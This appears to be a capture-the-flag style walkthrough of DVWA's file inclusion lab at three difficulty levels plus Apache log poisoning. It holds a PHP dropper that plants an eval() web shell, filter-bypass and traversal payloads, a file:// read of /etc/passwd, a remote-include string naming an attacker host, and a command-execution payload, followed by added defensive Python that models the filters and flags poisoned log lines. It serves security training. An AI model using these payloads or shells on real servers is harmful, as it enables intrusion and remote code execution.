Table of contents
Low
Medium
High
Middleware log file inclusion
Low
code analysis
The page parameter is taken from the request and passed straight to the include without any filtering, so any readable local path (or, with allow_url_include enabled, a remote URL) can be included.
exploit
First, at the file upload vulnerability, upload a small PHP dropper that writes a web shell to disk. The extension can be .txt or .php: it is the inclusion, not the extension, that makes PHP execute it.
<?php
// Dropper: when included, writes a one-line web shell next to the including script.
// The shell evaluates whatever is sent in the POST parameter "pass".
fputs(fopen('shell.php', 'w'), '<?php eval($_POST[\'pass\']); ?>');
?>
Then copy the upload path and include the uploaded file through the page parameter, using directory traversal (../) to reach it from the file inclusion script's directory.
No error is reported, which means the dropper executed.
A new shell.php now appears in the directory of the vulnerable script.
Connect to it with AntSword (password: pass).
Medium
code analysis
http://, https://, ../ and ..\ are removed with str_replace(). Because the replacement runs in a single pass, a keyword can be written twice, nested, so that stripping the inner copy leaves the outer one intact.
exploit
Write ../ as ..././ to bypass the traversal filter: removing the inner ../ leaves ../.
Write http:// as hthttp://tp:// to bypass the URL filter: removing the inner http:// leaves http://.
Including the dropper this way again generates shell.php successfully.
High
code analysis
fnmatch() requires the page parameter to match the pattern file* (or to equal include.php). The file:// pseudo-protocol starts with "file", so it satisfies the pattern while still letting us point at an arbitrary absolute path.
exploit
Use the file:// pseudo-protocol followed by the absolute path of the file to include (file:///path/to/file).
The include executes successfully without error.
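To make the Medium and High bypasses above concrete, here is an added example (not DVWA's own code) that re-implements each level's filter in Python, runs the write-up's payloads through them, and shows a recursive strip and an allowlist check that actually stop them. The page names in ALLOWED_PAGES are assumed for illustration.

```python
import fnmatch

# Added example: Python models of DVWA's Medium and High checks (re-implemented
# here for illustration, not DVWA's own code) and the bypass payloads above.

BAD_SUBSTRINGS = ("http://", "https://", "../", "..\\")


def medium_filter(page: str) -> str:
    """Medium level: one pass of str_replace() per blocked substring."""
    for bad in BAD_SUBSTRINGS:
        page = page.replace(bad, "")
    return page


def high_filter(page: str) -> bool:
    """High level: the page must match file* or be exactly include.php."""
    return fnmatch.fnmatch(page, "file*") or page == "include.php"


def recursive_strip(page: str) -> str:
    """Re-run the single-pass filter until nothing changes.

    This defeats the double-write trick (..././ and hthttp://tp://) because
    whatever the first pass leaves behind is stripped by the next one.
    """
    while True:
        stripped = medium_filter(page)
        if stripped == page:
            return page
        page = stripped


# Assumed set of legitimate pages for the allowlist (hypothetical names).
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}


def allowlist_check(page: str) -> bool:
    """Hardened check: exact match against known pages, no patterns, no stripping."""
    return page in ALLOWED_PAGES


if __name__ == "__main__":
    for payload in ("..././..././etc/passwd", "hthttp://tp://attacker/shell.txt"):
        print(f"{payload!r:40} medium -> {medium_filter(payload)!r}"
              f"  recursive -> {recursive_strip(payload)!r}")
    for payload in ("file:///etc/passwd", "../../etc/passwd", "file1.php"):
        print(f"{payload!r:40} high -> {high_filter(payload)}"
              f"  allowlist -> {allowlist_check(payload)}")
```

The output shows why str_replace() is the wrong tool: the nested payloads come out of medium_filter() as exactly the strings it was meant to remove, while recursive_strip() reduces them to harmless relative names, and file:///etc/passwd passes fnmatch("file*") but not the allowlist.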
Middleware log file inclusion
Taking Apache as an example, every request that is served is recorded in access.log, and errors (including failed requests) are recorded in error.log. The DVWA Apache logs are at the following path:
Put the malicious PHP code into the request path.
Checking the log, the code has been URL-encoded by the browser (for example <?php becomes %3C?php), so PHP would not treat it as an open tag.
Capture the request with Burp Suite and resend it from Repeater with the payload restored to its raw, unencoded form.
Checking the log file again, the malicious code has now been written into it verbatim.
Now use the file inclusion vulnerability, with directory traversal, to include the log file; PHP parses the poisoned line and executes it.
A simple way to verify this is to write <?php phpinfo(); ?> into the log and then include it.
The code is parsed and executed successfully.
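The log poisoning procedure above, as an added example that is not part of the original write-up: it shows the difference between the browser-encoded path and the raw request sent from Repeater, and then runs a small detection over constructed access.log lines to flag both the poisoning attempt and the later inclusion of the log. The log entries, host name and payload are all constructed for the example; the encoding shown is urllib's percent-encoding, used here to illustrate the effect, not a claim about exactly which characters a given browser escapes.

```python
import re
from urllib.parse import quote, unquote

# Added example (not DVWA's or the write-up's code). The payload, host and log
# lines below are constructed for illustration.

PAYLOAD = "<?php system($_GET['cmd']); ?>"


def browser_encoded_path(payload: str) -> str:
    """Path as a browser would percent-encode it: the <?php open tag is broken."""
    return "/" + quote(payload)


def raw_poison_request(host: str, payload: str) -> bytes:
    """Raw HTTP request as resent from Burp Repeater: payload left unencoded."""
    lines = [f"GET /{payload} HTTP/1.1", f"Host: {host}", "Connection: close", "", ""]
    return "\r\n".join(lines).encode()


# Detection side: a PHP open tag in a request line, raw or percent-encoded.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# A page= parameter that traverses directories, names a log, or uses a wrapper.
LOG_INCLUDE = re.compile(r"[?&]page=[^ \"&]*(\.\./|\.log|://)", re.IGNORECASE)


def find_poisoned_lines(log_lines):
    """Return 1-based indexes of entries carrying a PHP tag (decoded or not)."""
    return [n for n, line in enumerate(log_lines, 1)
            if PHP_TAG.search(line) or PHP_TAG.search(unquote(line))]


def find_log_inclusions(log_lines):
    """Return 1-based indexes of entries whose page= parameter looks like an LFI."""
    return [n for n, line in enumerate(log_lines, 1) if LOG_INCLUDE.search(line)]


# Constructed access.log sample: a normal request, the browser-encoded attempt,
# the raw poisoning request, and the inclusion of the log via traversal.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:56:01 +0000] "GET /%3C%3Fphp%20phpinfo%28%29%3B%3F%3E HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:57:12 +0000] "GET /<?php phpinfo();?> HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:58:40 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("browser sends:", browser_encoded_path(PAYLOAD))
    print("repeater sends:", raw_poison_request("dvwa.local", PAYLOAD).decode().splitlines()[0])
    print("poisoned lines:", find_poisoned_lines(SAMPLE_LOG))
    print("log inclusions:", find_log_inclusions(SAMPLE_LOG))
```

Both the encoded and the raw attempt are flagged because the detector decodes each line before matching; the 404 on the poisoning requests is expected, since the path does not exist, yet the entry still lands in access.log, which is the whole point of the technique.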